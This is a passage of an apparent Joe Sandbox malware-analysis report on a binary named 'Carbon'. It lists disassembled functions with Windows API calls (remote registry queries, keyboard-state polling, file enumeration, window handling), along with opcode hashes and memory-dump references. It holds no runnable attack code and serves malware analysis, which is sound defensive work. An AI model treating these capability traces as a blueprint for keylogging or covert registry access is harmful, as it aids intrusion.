                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 1149970189-3457252023
                                                            • Opcode ID: 7764a8eb4a6eaba785e09c9998c5e103bd8c501630c9321a931117b0d4489273
                                                            • Instruction ID: 04da9ccafd0aaf955b426fd5691765fc56647ef004dc389e79b18a52a0441111
                                                            • Opcode Fuzzy Hash: 7764a8eb4a6eaba785e09c9998c5e103bd8c501630c9321a931117b0d4489273
                                                            • Instruction Fuzzy Hash: F631C7B1504209ABDB219FA0DC49FEF37BCEF89744F1041B6F509D61A0EB7497449B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0097C5CB Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0097D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097BE35,?,?), ref: 0097D13C
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D178
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D1E6
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D21C
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0097C6C5
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0097C730
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097C754
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0097C7B3
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0097C86E
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0097C8DB
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0097C970
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0097C9C1
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0097CA6A
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0097CB09
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097CB16
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3102970594-0
                                                            • Opcode ID: 593a89e24ebe67b344a266dd983d3d4fee25788b3feb7b3bd8046ab3c32b6829
                                                            • Instruction ID: 4ea624f83a61b1bf484832831009be311e3cc9f7cf77f99b8f2c99fc32410cd9
                                                            • Opcode Fuzzy Hash: 593a89e24ebe67b344a266dd983d3d4fee25788b3feb7b3bd8046ab3c32b6829
                                                            • Instruction Fuzzy Hash: FA022CB16042049FD714DF28C895E2ABBE5FF88314F18C49DE549DB2A2DB31ED46CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095A36F Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0095A397
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0095A418
                                                            • GetKeyState.USER32(000000A0), ref: 0095A433
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0095A44D
                                                            • GetKeyState.USER32(000000A1), ref: 0095A462
                                                            • GetAsyncKeyState.USER32(00000011), ref: 0095A47A
                                                            • GetKeyState.USER32(00000011), ref: 0095A48C
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0095A4A4
                                                            • GetKeyState.USER32(00000012), ref: 0095A4B6
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0095A4CE
                                                            • GetKeyState.USER32(0000005B), ref: 0095A4E0
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: b290c05e7518b5f77101cb9d20bcc42c513db96bfa1313d904ffa7b31d4a941c
                                                            • Instruction ID: 3b2c32415c0e1a95fc314eddc5065ed07e95088210d7cf84927e810995a5fe13
                                                            • Opcode Fuzzy Hash: b290c05e7518b5f77101cb9d20bcc42c513db96bfa1313d904ffa7b31d4a941c
                                                            • Instruction Fuzzy Hash: AA41F9305047C96DFF31DAA688087A6BEA86F11305F048259DDC6462D2EBE89DCCC767
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0096A29A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0096A2E7
                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0096A3FA
                                                              • Part of subcall function 00963FE3: GetInputState.USER32 ref: 0096403A
                                                              • Part of subcall function 00963FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009640D5
                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0096A317
                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0096A3E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                            • String ID: *.*
                                                            • API String ID: 1972594611-438819550
                                                            • Opcode ID: 12c6cf8f35487cb2c82bb3381000d0d5b9e22daf33f32fee9d02245ce3f267b1
                                                            • Instruction ID: 06c7bfc883798e3a29e52b2308798e921788183553401b7cd934e268d23896a8
                                                            • Opcode Fuzzy Hash: 12c6cf8f35487cb2c82bb3381000d0d5b9e22daf33f32fee9d02245ce3f267b1
                                                            • Instruction Fuzzy Hash: 90416C71940209AFCF14EFA4CD49AEEBBB8FF05320F204056E805B2291E7309E85CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009823FC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: dbd768eebe08ffe75fd505a4f54465e892a24b9e3a2b822db6a586b10455317f
                                                            • Instruction ID: 970b6f7e5bc10da456a8d60291cfa5757cdb089bf5d16050d9a94c0a433193ce
                                                            • Opcode Fuzzy Hash: dbd768eebe08ffe75fd505a4f54465e892a24b9e3a2b822db6a586b10455317f
                                                            • Instruction Fuzzy Hash: 4D21E2317052149FD710AF3AC844B1A7BE9FF85314F59806CE84A8B3A1DB75ED42CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0094E514 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0094E526
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID: X64
                                                            • API String ID: 2645101109-893830106
                                                            • Opcode ID: a0f8a15a2a09b59c3cc270cf5a7163880d5ee54912f900cccb1b5710e64c929d
                                                            • Instruction ID: bd253cec62bf6055ea254b5e87b27cd0c951c43f96a7baf23ea07d4b8e5140d5
                                                            • Opcode Fuzzy Hash: a0f8a15a2a09b59c3cc270cf5a7163880d5ee54912f900cccb1b5710e64c929d
                                                            • Instruction Fuzzy Hash: EBD0E9B581A12DEBCF90CB90EC88DD977BCBB04304F144955F506A6140D77496499B10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009645E8 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 00964667
                                                            • _wcslen.LIBCMT ref: 00964672
                                                            • _wcslen.LIBCMT ref: 009646C9
                                                            • _wcslen.LIBCMT ref: 00964707
                                                            • GetDriveTypeW.KERNEL32(?), ref: 00964745
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096478D
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009647C8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009647F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1839972693-4113822522
                                                            • Opcode ID: f8adf60d45383c9a2aaf5bf159838acc11a365328135c49d8884d31536472652
                                                            • Instruction ID: 85c422b13faa031eec0cabbf551375bb48b0ef8c0a5a6d5bcc5d23648db4661a
                                                            • Opcode Fuzzy Hash: f8adf60d45383c9a2aaf5bf159838acc11a365328135c49d8884d31536472652
                                                            • Instruction Fuzzy Hash: F271C0726083159FC710EF78C88086ABBE9FF98768F104A2DF99597251E730DD45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00956114 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 00956127
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00956139
                                                            • SetWindowTextW.USER32(?,?), ref: 00956150
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00956165
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0095616B
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0095617B
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00956181
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009561A2
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009561BC
                                                            • GetWindowRect.USER32(?,?), ref: 009561C5
                                                            • _wcslen.LIBCMT ref: 0095622C
                                                            • SetWindowTextW.USER32(?,?), ref: 00956268
                                                            • GetDesktopWindow.USER32 ref: 0095626E
                                                            • GetWindowRect.USER32(00000000), ref: 00956275
                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009562CC
                                                            • GetClientRect.USER32(?,?), ref: 009562D9
                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 009562FE
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00956328
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                            • String ID:
                                                            • API String ID: 895679908-0
                                                            • Opcode ID: 8c341e5a9a7b88785c595f84b247376ffc7eacebe95aa45db25359f243a77c4e
                                                            • Instruction ID: ce78f74328e7d4e4a09336ccb65aa4a05841336bda73bd8df97aec3183f7194e
                                                            • Opcode Fuzzy Hash: 8c341e5a9a7b88785c595f84b247376ffc7eacebe95aa45db25359f243a77c4e
                                                            • Instruction Fuzzy Hash: F5719D31904709AFDB20DFA9CE45AAEBBF9FF48705F100918E996E32A0D775E944CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00970595 Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 009705AE
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 009705B9
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 009705C4
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 009705CF
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 009705DA
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 009705E5
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 009705F0
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 009705FB
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00970606
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00970611
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 0097061C
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00970627
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00970632
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 0097063D
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00970648
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00970653
                                                            • GetCursorInfo.USER32(?), ref: 00970663
                                                            • GetLastError.KERNEL32 ref: 009706A5
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 59f8b1c7de6d8f605a24bb9466bb9ca3dc8c436836e0769c090e9fdd2add3ad4
                                                            • Instruction ID: fd2170af5d758813e37a5b6bb6a46d5ac15ebb8f39c41b133876d78293edf0e6
                                                            • Opcode Fuzzy Hash: 59f8b1c7de6d8f605a24bb9466bb9ca3dc8c436836e0769c090e9fdd2add3ad4
                                                            • Instruction Fuzzy Hash: C04166B1D08319AADB10DFBA8C8585EBFE8FF44754B50852AE11DE7281DA78D901CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00910416 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00910416
                                                              • Part of subcall function 0091043D: InitializeCriticalSectionAndSpinCount.KERNEL32(009C16FC,00000FA0,41B96570,?,?,?,?,00932703,000000FF), ref: 0091046C
                                                              • Part of subcall function 0091043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00932703,000000FF), ref: 00910477
                                                              • Part of subcall function 0091043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00932703,000000FF), ref: 00910488
                                                              • Part of subcall function 0091043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0091049E
                                                              • Part of subcall function 0091043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009104AC
                                                              • Part of subcall function 0091043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009104BA
                                                              • Part of subcall function 0091043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009104E5
                                                              • Part of subcall function 0091043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009104F0
                                                            • ___scrt_fastfail.LIBCMT ref: 00910437
                                                              • Part of subcall function 009103F3: __onexit.LIBCMT ref: 009103F9
                                                            Strings
                                                            • WakeAllConditionVariable, xrefs: 009104B2
                                                            • SleepConditionVariableCS, xrefs: 009104A4
                                                            • kernel32.dll, xrefs: 00910483
                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00910472
                                                            • InitializeConditionVariable, xrefs: 00910498
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                            • API String ID: 66158676-1714406822
                                                            • Opcode ID: 2926eb133c77bd211b87a586c026469614a0148bdeb066d276ea934c438b32e1
                                                            • Instruction ID: 3373a89f18be3e07e5083f3bcdb31779fa9dbd6d6233d4fca334181b3dc7493f
                                                            • Opcode Fuzzy Hash: 2926eb133c77bd211b87a586c026469614a0148bdeb066d276ea934c438b32e1
                                                            • Instruction Fuzzy Hash: 2B210A32B5D3196FD7142BA89C49FA93798EFC5F65F000129F505972D0DBF598C08A90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095A692 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0095A713
                                                            • SetKeyboardState.USER32(?), ref: 0095A77E
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0095A79E
                                                            • GetKeyState.USER32(000000A0), ref: 0095A7B5
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0095A7E4
                                                            • GetKeyState.USER32(000000A1), ref: 0095A7F5
                                                            • GetAsyncKeyState.USER32(00000011), ref: 0095A821
                                                            • GetKeyState.USER32(00000011), ref: 0095A82F
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0095A858
                                                            • GetKeyState.USER32(00000012), ref: 0095A866
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0095A88F
                                                            • GetKeyState.USER32(0000005B), ref: 0095A89D
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 80c7e08aaebc8fb813dfd15dbc94b5deb756921728592f12f2f428be191b3e11
                                                            • Instruction ID: 00e3e3fb93825a1a47482700f8c4c4ba3407cc128b57c03bed42e09b8fba46a8
                                                            • Opcode Fuzzy Hash: 80c7e08aaebc8fb813dfd15dbc94b5deb756921728592f12f2f428be191b3e11
                                                            • Instruction Fuzzy Hash: F351FA3090478829FB34DB7288157EABFF89F11381F084699CDC65B1C2DA549E8CCB67
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009563BF Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 009563DB
                                                            • GetWindowRect.USER32(00000000,?), ref: 009563F4
                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00956452
                                                            • GetDlgItem.USER32(?,00000002), ref: 00956462
                                                            • GetWindowRect.USER32(00000000,?), ref: 00956474
                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009564C8
                                                            • GetDlgItem.USER32(?,000003E9), ref: 009564D6
                                                            • GetWindowRect.USER32(00000000,?), ref: 009564E8
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 0095652A
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0095653D
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00956553
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00956560
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 96e93356d49783f9101f185302817ed93cfad1a0ec5f5643d39526c644c2f81b
                                                            • Instruction ID: d6abcd1ac03ff72e0a8507dd8b65df3ffe59320aede06c30543523a453b050af
                                                            • Opcode Fuzzy Hash: 96e93356d49783f9101f185302817ed93cfad1a0ec5f5643d39526c644c2f81b
                                                            • Instruction Fuzzy Hash: 6D512EB1A11209AFDF08CF69DD85AAEBBB9FB48311F508128F919E72D0E7709D04CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009743B7 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 009743E3
                                                            • CoInitialize.OLE32(00000000), ref: 00974411
                                                            • CoUninitialize.OLE32 ref: 0097441B
                                                            • _wcslen.LIBCMT ref: 009744B4
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00974538
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0097465C
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00974695
                                                            • CoGetObject.OLE32(?,00000000,00990B80,?), ref: 009746B4
                                                            • SetErrorMode.KERNEL32(00000000), ref: 009746C7
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0097474B
                                                            • VariantClear.OLEAUT32(?), ref: 0097475F
                                                            Memory Dump Source
